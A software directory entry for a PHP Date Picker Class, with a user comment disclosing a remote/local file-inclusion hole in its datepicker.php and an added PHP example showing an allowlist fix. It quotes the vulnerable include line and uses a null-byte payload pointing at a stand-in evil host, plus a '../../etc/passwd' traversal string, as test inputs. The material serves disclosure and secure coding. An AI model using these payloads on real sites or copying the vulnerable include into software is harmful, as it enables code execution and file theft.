About:
PHP Date Picker Class will automatically generate the required HTML and JavaScript code that will make a pop-up window appear to let the user choose a date from a calendar. The selected date will be passed to a user-specified control from the calling page. Every aspect is customizable by modifying a template and a related CSS file. The format in which the date is returned, the default date and time period, and the first day of the week can be selected.
Author:
Stefan Gabos
Homepage:
http://stefangabos.blogspot.com/[..]ra-php-component-framework-php-date.html
Dependencies:
No dependencies filed
» Rating:
(not rated)
» Vitality: 0.00% (Rank 7896)
» Popularity: 0.76% (Rank 7700)
Record hits: 14,466
URL hits: 3,940
Subscribers: 11
Comments
Code needs Security
by tobozo - Oct 12th 2006 03:41:29
Very nice work, however the code in datepicker.php seems to trust user input a bit too much.
include_once("../languages/".$_POST["language"].".php");
On some platforms, what would happen if a crafted HTML form was submitted with a value like this one:
%00http://www.evil.site.com/evil.script ?
Quick fix:
Validate any single piece of data coming from the wild. There are a few methods to do this depending on what you need from this data.
// Allowlist: the client may only pick one of these keys; the file name is never taken from the request.
$langs = array(
    'default' => 'english.php',
    'english' => 'english.php',
    'french'  => 'french.php',
    // (...)
);
// Check the KEYS of the allowlist (in_array() would test the values, so 'english' would never match).
// is_string() guards against language[]=... array input, isset() against a missing or unknown key.
if (!isset($_POST['language']) || !is_string($_POST['language']) || !isset($langs[$_POST['language']])) {
    $language = $langs['default'];
} else {
    $language = $langs[$_POST['language']];
}
include_once("../languages/" . $language);
Methods for validating numbers:
$myNumber = sprintf('%02d', $_GET['myNumber']);
Also works (dirty):
$myNumber = (int)$_GET['myNumber'];
Hope this helps
tobozo
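The allowlist approach from the comment above, carried through as a stand-alone added example (this is not code from the PHP Date Picker Class or from the commenter): the language key sent by the client is mapped to a file name from a fixed array, so the include path is never assembled from request data, and numeric parameters are checked strictly instead of being coerced. The language file names and the sample inputs are assumptions constructed for the demonstration; the project's own files may differ.

```php
<?php
declare(strict_types=1);

/**
 * Map a client-supplied language key to a file name from $allowed.
 * Only the KEYS of $allowed are accepted. A missing value, a non-string
 * (e.g. language[]=x), an unknown key, a "%00..." URL or a "../" path all
 * fall back to the default entry, and the returned name always comes from
 * the allowlist, never from the request.
 */
function resolve_language_file(array $allowed, $requested, string $default = 'default'): string
{
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return $allowed[$default];
    }
    return $allowed[$requested];
}

/**
 * Strict integer validation for a form field: accepts only a string (or int)
 * made of decimal digits inside [$min, $max] and returns it as int, otherwise
 * null. Unlike (int)$x or sprintf('%02d', $x) it rejects "12abc", "", "1e3"
 * and "-1" instead of silently turning them into a number.
 */
function validate_int($value, int $min, int $max): ?int
{
    if (is_int($value)) {
        $value = (string) $value;
    }
    if (!is_string($value) || !ctype_digit($value)) {
        return null;
    }
    $n = (int) $value;
    return ($n >= $min && $n <= $max) ? $n : null;
}

// Assumed allowlist; file names are placeholders for the project's language files.
$langs = [
    'default' => 'english.php',
    'english' => 'english.php',
    'french'  => 'french.php',
];

// Constructed sample inputs standing in for $_POST['language'].
$samples = [
    'english',
    'french',
    'english.php',                             // a value, not a key: rejected
    "%00http://www.evil.site.com/evil.script", // the payload discussed in the comment
    '../../etc/passwd',
    ['english'],                               // array input (language[]=english)
    null,                                      // parameter absent
];
foreach ($samples as $input) {
    $file = resolve_language_file($langs, $input);
    printf("%-45s -> ../languages/%s\n", json_encode($input), $file);
}

// Constructed sample values standing in for a month field from the date form.
foreach (['07', '12', '13', '12abc', '', '1e3', '-1'] as $month) {
    $checked = validate_int($month, 1, 12);
    printf("month %-8s -> %s\n", json_encode($month), $checked === null ? 'rejected' : (string) $checked);
}

// The include is then built only from an allowlisted name (shown, not executed here):
// include_once __DIR__ . '/../languages/' . resolve_language_file($langs, $_POST['language'] ?? null);
```

Running the script prints one line per sample: the two valid keys resolve to their files, every other language input falls back to english.php, and for the month field "07" and "12" are accepted while "13", "12abc", "", "1e3" and "-1" are rejected. Resolving to a default rather than failing is a design choice that keeps the form usable; if the page must instead refuse unknown languages, make resolve_language_file return null for the fallback case and reject the request.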